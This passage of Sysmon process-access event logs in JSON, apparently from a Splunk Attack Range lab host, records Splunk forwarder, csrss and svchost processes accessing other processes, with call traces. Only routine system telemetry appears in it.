C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:56.611","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1274-5F25-0000-001009510900}","TargetProcessId":"4152","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6516,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:56.611\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1274-5F25-0000-001009510900}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:56.611","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1274-5F25-0000-001009510900}","TargetProcessId":"4152","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6517,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:56.611\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:56.611","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6518,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:56.611\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:56.611","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6519,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:56.611\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:56.611","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6520,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:56.611\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:56.611","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6521,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:56.611\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:56.611","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6522,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:56.611\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:56.611","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6523,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:56.611\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 